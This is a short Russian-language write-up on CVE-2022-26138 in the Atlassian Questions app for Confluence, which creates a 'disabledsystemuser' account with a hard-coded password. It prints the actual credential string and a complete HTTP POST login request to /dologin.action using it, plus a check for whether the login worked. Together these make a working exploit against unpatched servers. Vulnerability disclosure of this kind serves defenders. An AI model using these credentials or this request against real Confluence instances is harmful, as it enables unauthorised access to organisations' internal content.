
Atlassian Questions Жестко заданный пароль (CVE-2022-26138)

Приложение Atlassian Questions For Confluence для Confluence Server и Data Center
создает учетную запись пользователя Confluence в группе confluence-users
с именем disabledsystemuser и жестко заданным паролем. Удаленный
неаутентифицированный злоумышленник, знающий жестко заданный пароль,
может использовать это для входа в Confluence и получения доступа ко всем
ресурсам, доступным пользователям группы confluence-users.
Эта учетная запись создается при установке версий 2.7.34, 2.7.35 и 3.0.2 приложения.
Жестко заданные учетные данные:
disabledsystemuserdisabled1system1user6708POST /dologin.action HTTP/1.1
Host: victim.local
Content-Type: application/x-www-form-urlencoded
os_username=disabledsystemuser&os_password=disabled1system1user6708&login=Log+in&os_destination=%2Fvulnerable.action
Если сервер перенаправляет на /vulnerable.action, учетные данные действительны.
Жестко заданные учетные данные находились в открытом виде внутри jar-файлов уязвимого плагина:
https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/confluence-questions-3.0.2.jar